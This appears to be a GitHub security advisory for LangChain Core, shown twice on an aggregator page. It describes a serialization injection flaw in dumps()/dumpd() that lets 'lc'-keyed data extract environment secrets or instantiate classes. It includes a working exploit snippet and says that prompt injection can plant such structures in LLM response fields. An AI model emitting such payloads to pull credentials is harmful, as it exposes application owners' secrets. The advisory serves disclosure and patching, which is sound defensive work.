Headline

GHSA-c67j-w6g6-q2cm: LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs

Summary

A serialization injection vulnerability exists in LangChain’s dumps() and dumpd() functions. The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.

Attack surface

The core vulnerability was in dumps() and dumpd(): these functions failed to escape user-controlled dictionaries containing 'lc' keys. When this unescaped data was later deserialized via load() or loads(), the injected structures were treated as legitimate LangChain objects rather than plain user data.

This escaping bug enabled several attack vectors:

Injection via user data: Malicious LangChain object structures could be injected through user-controlled fields like metadata, additional_kwargs, or response_metadata
Class instantiation within trusted namespaces: Injected manifests could instantiate any Serializable subclass, but only within the pre-approved trusted namespaces (langchain_core, langchain, langchain_community). This includes classes with side effects in __init__ (network calls, file operations, etc.). Note that namespace validation was already enforced before this patch, so arbitrary classes outside these trusted namespaces could not be instantiated.

Security hardening

This patch fixes the escaping bug in dumps() and dumpd() and introduces new restrictive defaults in load() and loads(): allowlist enforcement via allowed_objects="core" (restricted to serialization mappings), secrets_from_env changed from True to False, and default Jinja2 template blocking via init_validator. These are breaking changes for some use cases.

Who is affected?

Applications are vulnerable if they:

Use astream_events(version="v1") — The v1 implementation internally uses vulnerable serialization. Note: astream_events(version="v2") is not vulnerable.
Use Runnable.astream_log() — This method internally uses vulnerable serialization for streaming outputs.
Call dumps() or dumpd() on untrusted data, then deserialize with load() or loads() — Trusting your own serialization output makes you vulnerable if user-controlled data (e.g., from LLM responses, metadata fields, or user inputs) contains 'lc' key structures.
Deserialize untrusted data with load() or loads() — Directly deserializing untrusted data that may contain injected 'lc' structures.
Use RunnableWithMessageHistory — Internal serialization in message history handling.
Use InMemoryVectorStore.load() to deserialize untrusted documents.
Load untrusted generations from cache using langchain-community caches.
Load untrusted manifests from the LangChain Hub via hub.pull.
Use StringRunEvaluatorChain on untrusted runs.
Use create_lc_store or create_kv_docstore with untrusted documents.
Use MultiVectorRetriever with byte stores containing untrusted documents.
Use LangSmithRunChatLoader with runs containing untrusted messages.

The most common attack vector is through LLM response fields like additional_kwargs or response_metadata, which can be controlled via prompt injection and then serialized/deserialized in streaming operations.

Impact

Attackers who control serialized data can extract environment variable secrets by injecting {"lc": 1, "type": "secret", "id": ["ENV_VAR"]} to load environment variables during deserialization (when secrets_from_env=True, which was the old default). They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within trusted namespaces with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.

Key severity factors:

Affects the serialization path - applications trusting their own serialization output are vulnerable
Enables secret extraction when combined with secrets_from_env=True (the old default)
LLM responses in additional_kwargs can be controlled via prompt injection

Exploit example

from langchain_core.load import dumps, load
import os

# Attacker injects secret structure into user-controlled data
attacker_dict = {
    "user_data": {
        "lc": 1,
        "type": "secret",
        "id": ["OPENAI_API_KEY"]
    }
}

serialized = dumps(attacker_dict)  # Bug: does NOT escape the 'lc' key

os.environ["OPENAI_API_KEY"] = "sk-secret-key-12345"
deserialized = load(serialized, secrets_from_env=True)

print(deserialized["user_data"])  # "sk-secret-key-12345" - SECRET LEAKED!

Security hardening changes (breaking changes)

This patch introduces three breaking changes to load() and loads():

New allowed_objects parameter (defaults to 'core'): Enforces allowlist of classes that can be deserialized. The 'all' option corresponds to the list of objects specified in mappings.py while the 'core' option limits to objects within langchain_core. We recommend that users explicitly specify which objects they want to allow for serialization/deserialization.
secrets_from_env default changed from True to False: Disables automatic secret loading from environment
New init_validator parameter (defaults to default_init_validator): Blocks Jinja2 templates by default

Migration guide

No changes needed for most users

If you’re deserializing standard LangChain types (messages, documents, prompts, trusted partner integrations like ChatOpenAI, ChatAnthropic, etc.), your code will work without changes:

from langchain_core.load import load

# Uses default allowlist from serialization mappings
obj = load(serialized_data)

For custom classes

If you’re deserializing custom classes not in the serialization mappings, add them to the allowlist:

from langchain_core.load import load
from my_package import MyCustomClass

# Specify the classes you need
obj = load(serialized_data, allowed_objects=[MyCustomClass])

For Jinja2 templates

Jinja2 templates are now blocked by default because they can execute arbitrary code. If you need Jinja2 templates, pass init_validator=None:

from langchain_core.load import load
from langchain_core.prompts import PromptTemplate

obj = load(
    serialized_data,
    allowed_objects=[PromptTemplate],
    init_validator=None
)

[!WARNING] Only disable init_validator if you trust the serialized data. Jinja2 templates can execute arbitrary Python code.

For secrets from environment

secrets_from_env now defaults to False. If you need to load secrets from environment variables:

from langchain_core.load import load

obj = load(serialized_data, secrets_from_env=True)

Credits

Dumps bug was reported by @yardenporat
Changes for security hardening due to findings from @0xn3va and @VladimirEliTokarev

1 month ago

ghsa

Open in Source

#vulnerability #git

Summary

A serialization injection vulnerability exists in LangChain’s dumps() and dumpd() functions. The functions do not escape dictionaries with ‘lc’ keys when serializing free-form dictionaries. The ‘lc’ key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.

Attack surface

The core vulnerability was in dumps() and dumpd(): these functions failed to escape user-controlled dictionaries containing ‘lc’ keys. When this unescaped data was later deserialized via load() or loads(), the injected structures were treated as legitimate LangChain objects rather than plain user data.

This escaping bug enabled several attack vectors:

Injection via user data: Malicious LangChain object structures could be injected through user-controlled fields like metadata, additional_kwargs, or response_metadata
Class instantiation within trusted namespaces: Injected manifests could instantiate any Serializable subclass, but only within the pre-approved trusted namespaces (langchain_core, langchain, langchain_community). This includes classes with side effects in init (network calls, file operations, etc.). Note that namespace validation was already enforced before this patch, so arbitrary classes outside these trusted namespaces could not be instantiated.

Security hardening

This patch fixes the escaping bug in dumps() and dumpd() and introduces new restrictive defaults in load() and loads(): allowlist enforcement via allowed_objects="core" (restricted to serialization mappings), secrets_from_env changed from True to False, and default Jinja2 template blocking via init_validator. These are breaking changes for some use cases.

Who is affected?

Applications are vulnerable if they:

Use astream_events(version="v1") — The v1 implementation internally uses vulnerable serialization. Note: astream_events(version="v2") is not vulnerable.
Use Runnable.astream_log() — This method internally uses vulnerable serialization for streaming outputs.
Call dumps() or dumpd() on untrusted data, then deserialize with load() or loads() — Trusting your own serialization output makes you vulnerable if user-controlled data (e.g., from LLM responses, metadata fields, or user inputs) contains ‘lc’ key structures.
Deserialize untrusted data with load() or loads() — Directly deserializing untrusted data that may contain injected ‘lc’ structures.
Use RunnableWithMessageHistory — Internal serialization in message history handling.
Use InMemoryVectorStore.load() to deserialize untrusted documents.
Load untrusted generations from cache using langchain-community caches.
Load untrusted manifests from the LangChain Hub via hub.pull.
Use StringRunEvaluatorChain on untrusted runs.
Use create_lc_store or create_kv_docstore with untrusted documents.
Use MultiVectorRetriever with byte stores containing untrusted documents.
Use LangSmithRunChatLoader with runs containing untrusted messages.

The most common attack vector is through LLM response fields like additional_kwargs or response_metadata, which can be controlled via prompt injection and then serialized/deserialized in streaming operations.

Impact

Attackers who control serialized data can extract environment variable secrets by injecting {"lc": 1, "type": "secret", "id": [“ENV_VAR”]} to load environment variables during deserialization (when secrets_from_env=True, which was the old default). They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within trusted namespaces with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.

Key severity factors:

Affects the serialization path - applications trusting their own serialization output are vulnerable
Enables secret extraction when combined with secrets_from_env=True (the old default)
LLM responses in additional_kwargs can be controlled via prompt injection

Exploit example

from langchain_core.load import dumps, load import os

# Attacker injects secret structure into user-controlled data attacker_dict = { "user_data": { "lc": 1, "type": "secret", "id": [“OPENAI_API_KEY”] } }

serialized = dumps(attacker_dict) # Bug: does NOT escape the ‘lc’ key

os.environ[“OPENAI_API_KEY”] = “sk-secret-key-12345” deserialized = load(serialized, secrets_from_env=True)

print(deserialized[“user_data”]) # “sk-secret-key-12345” - SECRET LEAKED!

Security hardening changes (breaking changes)

This patch introduces three breaking changes to load() and loads():

New allowed_objects parameter (defaults to ‘core’): Enforces allowlist of classes that can be deserialized. The ‘all’ option corresponds to the list of objects specified in mappings.py while the ‘core’ option limits to objects within langchain_core. We recommend that users explicitly specify which objects they want to allow for serialization/deserialization.
secrets_from_env default changed from True to False: Disables automatic secret loading from environment
New init_validator parameter (defaults to default_init_validator): Blocks Jinja2 templates by default

Migration guide****No changes needed for most users

If you’re deserializing standard LangChain types (messages, documents, prompts, trusted partner integrations like ChatOpenAI, ChatAnthropic, etc.), your code will work without changes:

from langchain_core.load import load

# Uses default allowlist from serialization mappings obj = load(serialized_data)

For custom classes

If you’re deserializing custom classes not in the serialization mappings, add them to the allowlist:

from langchain_core.load import load from my_package import MyCustomClass

# Specify the classes you need obj = load(serialized_data, allowed_objects=[MyCustomClass])

For Jinja2 templates

Jinja2 templates are now blocked by default because they can execute arbitrary code. If you need Jinja2 templates, pass init_validator=None:

from langchain_core.load import load from langchain_core.prompts import PromptTemplate

obj = load( serialized_data, allowed_objects=[PromptTemplate], init_validator=None )

Warning

Only disable init_validator if you trust the serialized data. Jinja2 templates can execute arbitrary Python code.

For secrets from environment

secrets_from_env now defaults to False. If you need to load secrets from environment variables:

from langchain_core.load import load

obj = load(serialized_data, secrets_from_env=True)

Credits

Dumps bug was reported by @YardenPorat
Changes for security hardening due to findings from @0xn3va and @VladimirEliTokarev

References

GHSA-c67j-w6g6-q2cm
langchain-ai/langchain#34455
langchain-ai/langchain#34458
langchain-ai/langchain@5ec0fa6
langchain-ai/langchain@d9ec4c5
https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.81
https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.5

Last week’s cyber news in 2025 was not about one big incident. It was about many small cracks opening at the same time. Tools people trust every day behave in unexpected ways. Old flaws resurfaced. New ones were used almost immediately. A common theme ran through it all in 2025. Attackers moved faster than fixes. Access meant for work, updates, or support kept getting abused. And damage did not

Critical LangChain Core Vulnerability Exposes Secrets via Serialization Injection

A critical security flaw has been disclosed in LangChain Core that could be exploited by an attacker to steal sensitive secrets and even influence large language model (LLM) responses through prompt injection. LangChain Core (i.e., langchain-core) is a core Python package that's part of the LangChain ecosystem, providing the core interfaces and model-agnostic abstractions for building

1 month ago

The Hacker News

Open in Source

#vulnerability #google #nodejs #js #git #perl #The Hacker News